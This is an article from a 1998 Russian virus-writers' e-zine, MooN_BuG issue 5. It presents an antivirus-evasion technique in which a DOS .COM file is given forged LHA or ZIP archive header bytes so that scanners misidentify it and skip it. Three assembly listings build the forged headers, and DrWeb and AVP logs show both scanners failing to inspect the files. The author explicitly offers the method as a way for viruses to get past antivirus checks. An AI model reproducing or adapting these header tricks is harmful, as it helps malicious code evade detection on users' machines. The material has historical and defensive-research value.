[TulaAnti&ViralClub] PRESENTS ...
MooN_BuG, Issue 5, May 1998 file 007
Технология "Allien Header"
by RedArc
Скачал я как это из инет-помойки всякого барахла и во избежание различного
рода сюрпризов натравил на каталог с этим барахлом AVP и DrWeb... И чем то
привлекли мое внимание сообщения этих антивирусов, типа:
ZIP - неизвестный формат, пропущен
И подтвердилась старинная поговорка: лучшее - враг хорошего... Если антивирус
анализирует формат заголовка файла и пытается распаковать файл перед
проверкой, то почему бы не дать антивирусу поверить, что данный файл - архив?
П р е д ы с т о р и я. Идея конечно не новая, когда то Alternative Coder
пытался уже сделать такую фичу - заменить последнии байты распаковщика
EXE-пакеров на команды перехода вируса. Это интересно с той точки зрения, что
DrWeb определив, что файл упакован, попытается распаковать его своим сервисом,
тем самым затрет тело вируса и ничего не найдет, в то же время, при старте
упакованного файла, вирус получит управление. Но по каким то причинам
исследования в этой области были прекращены.
И так, вернемся к нашим баранам. Решил я подойти с другой стороны к вопросу
плохих архивов и посмотрел на эти файлы в hiew... Еще через некоторое время
были сбацаны два первых файла, от реакции на которые антивирусов, а в
особенности Dos Navigator, мне срочно захотелось раскупорить еще одну бутылку
пива... ;)
=== Cut === Моделирование плохого заголовка
;1998 (c) by RedArc // TAVC
Model Tiny
.code
.286
org 100h
start:
and bx,cx
sub ax,0686ch
xor ax,0142dh
dw 0103h
jmp Entry
db 100h dup (90h)
Entry:
int 20h
end start
=== Cut ===
=== Cut === Моделирование ошибки распаковки
;1998 (c) by RedArc // TAVC
Model Tiny
.code
.286
org 100h
start:
and bx,cx
sub ax,0686ch
xor ax,0142dh
dw 0103h
jmp Entry
db 100h dup (90h)
db 100h dup (91h)
db 100h dup (92h)
db 100h dup (93h)
db 100h dup (94h)
db 100h dup (95h)
Entry:
int 20h
end start
=== Cut ===
=== Cut === Реакция антивируса DrWeb на эту лажу
────────────────────────────────────────
Dr.Web, версия 4.00 (06 апреля 1998)
Copyright (c) Игорь Данилов, 1992-98
Протокол работы от 1998 May 04 20:22:55
Командная строка:
────────────────────────────────────────
Загрузка вирусной базы DRW40001.VDB - Ok, вирусов - 261
Загрузка вирусной базы DRW40002.VDB - Ok, вирусов - 170
Загрузка вирусной базы DRW40003.VDB - Ok, вирусов - 62
Загрузка вирусной базы DRWEBASE.VDB - Ok, вирусов - 7135
Поиск вирусов в памяти компьютера - 352 Kb; 32%
Прервать тестирование?
Да
Тестирование прервано по желанию пользователя!
В памяти компьютера вирусов не обнаружено
Поиск вирусов в C:\TEST\*.*:
C:\TEST\DN_1.ASM - Ok
C:\TEST\DN_1.COM - архив LHA
�C:\TEST\DN_1.COM\??? - некорректный заголовок!
C:\TEST\DN_2.ASM - Ok
C:\TEST\DN_2.COM - архив LHA
�C:\TEST\DN_2.COM\??? - некорректный заголовок!
Отчет для диска C:
Проверено : файлов и загрузочных секторов - 2
Обнаружено: вирусов и инфицированных программ - 0
Время сканирования: 00:00:00
=== Cut ===
Ладно, решил посмотреть на заголовки других архивов... Для начала взял
обычный ZIP-архив...
=== Cut === Моделирование ошибочного формата ZIP-архива
;1998 (c) by RedArc // TAVC
Model Tiny
.code
.286
org 100h
start:
push ax
dec bx
db 003h, 004h, 014h, 000h, 002h, 080h, 008h, 000h, 020h, 010h
db 08eh, 01fh, 03eh
jmp short Entry
db 0f1h, 003h, 02eh, 000h, 000h, 0d0h, 064h, 000h, 000h, 012h
db 000h, 022h, 000h, 053h, 059h, 053h, 054h, 045h, 04dh, 02fh
db 043h, 054h, 04ch, 033h, 044h, 056h, 032h, 02eh, 044h, 04ch
db 04ch, 007h, 000h, 01eh, 000h, 0dah, 06fh, 05fh, 0efh, 0e6h
db 0f7h
Entry:
pop ax
mov bx,ax
push cs
pop ds
int 20h
end start
=== Cut ===
Особенно порадовала реакция антивируса AVPLite ;)
=== Cut ===
■ Antiviral Toolkit Pro by Eugene Kaspersky Версия �3.0
■ Отчет: �05-05-1998 12:39:52
■ Командная строка: �C:\TEST\ /W=avplite.rpt
D:\AIDS\AVP30.LIT\AVPLITE.EXE : упакован Diet
C:\TEST\AAA.COM : архив ZIP
C:\TEST\AAA.COM\ : неизвестный формат, пропущен
Вирусов не обнаружено
Проверено: 1 файлов
1 архивов
1 каталогов
0 килобайт
Время: 00:00:00
=== Cut ===
А вы говорите - анализатор кода, эмуляторы, ... Чушь все это. Антивирус -
программа, призванная бороться с вирусами. Все. Точка. Критерий для нее один -
надежность. В понятие надежность так же входит прозрачность работы антивируса
от вируса. Зачем? Затем, чтобы вирусы не отключали стелс-механизм, чтобы не
патчили вирусы в памяти, не мухлевали с командной строкой, ... Все, что удобно
для пользователя - ухудшает качество антивируса. Вставили глюкавый интерфейс с
окошками в DrWeb - вирусы отловят запуск антивируса по этим окошкам, вставили
копирайты в базы ADINF - вирусы по этим копирайтам найдут эти базы и вытрут к
ентой матери, решили ускорить сканирование определением формата файлов -
вирусы подсунут другой формат...
